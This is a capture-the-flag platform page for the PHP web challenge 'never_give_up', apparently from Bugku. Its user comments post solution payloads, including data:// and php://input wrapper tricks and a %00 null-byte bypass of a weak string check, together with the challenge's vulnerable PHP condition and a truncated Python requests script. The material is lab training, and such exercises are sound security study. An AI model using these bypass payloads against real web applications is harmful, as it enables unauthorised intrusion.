never_give_upWEB 未解决

分数: 25 金币: 3
题目作者: 未知
一  血: blue
一血奖励: 1金币
解  决: 3946
提  示:
描  述:
作者:御结冰城
评论
evens 1年前

?id=0a&b=*111111&a=data://text/plain;base64,YnVna3UgaXMgYSBuaWNlIHBsYXRlZm9ybSE=

回复 0

wxy1343 2年前

http://114.67.175.224:14407/hello.php?id=a&a=data:,bugku is a nice plateform!&b=%0011111

回复 0

xclay 2年前

伙伴们输入参数的时候一定不要带任何引号,不然不好使

回复 1

Restwlaq 2年前

第一步直接view-source:url/1p.html。第二步,如果用Bp就可以发现靶机php版本响应是5.5,一篇文章说php://input在5.3以后就不用了。所以小伙伴们不要纠结php://input了,使用data://协议吧

回复 0

joyoung 2年前

?id=0a&a=data://text/plain,bugku is a nice plateform!&b=?12345

回复 0

zdfy005 2年前

import requests url='http://114.67.246.176:14183/?id=0dut2251&a=php://input&b=*000000' head={'User-Agent':'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0'} data='b

回复 0

zdfy005 2年前

$data = @file_get_contents($a,'r'); if($data=="bugku is a nice plateform!" and $id==0 and strlen($b)>5 and eregi("111".substr($b,0,1),"1114") and substr($b,0,1)!=4)

回复 0

笨笨笨蛋 2年前

真的没懂

回复 3

qf3640 2年前

https://blog.csdn.net/qq_64201116/article/details/125617813?spm=1001.2014.3001.5502

回复 2

⎝/fuhry\⎠ 2年前

https://blog.csdn.net/lshandel/article/details/118736402

回复 1

WriteUp

image
harry

3 金币

评分(23)

解题动态

Hehe0619 攻破了该题 5小时前
春遇枝庭 攻破了该题 1天前
a1451753998 攻破了该题 1天前
hackerbugku 攻破了该题 2天前
zhuizhui 攻破了该题 2天前
dwx1583 攻破了该题 3天前
qidianzhi 攻破了该题 5天前
mecurio 攻破了该题 6天前
ww__ 攻破了该题 7天前
Future92 攻破了该题 7天前
aaaaab 攻破了该题 8天前
跃迁ctfer 攻破了该题 9天前
千机www 攻破了该题 9天前
cafei2022 攻破了该题 14天前
网络安全亮 攻破了该题 15天前
Da1ly_1upup 攻破了该题 15天前
wzl真帅 攻破了该题 16天前
cs888 攻破了该题 17天前
124要留就要77 攻破了该题 18天前
dicce 攻破了该题 20天前
问题反馈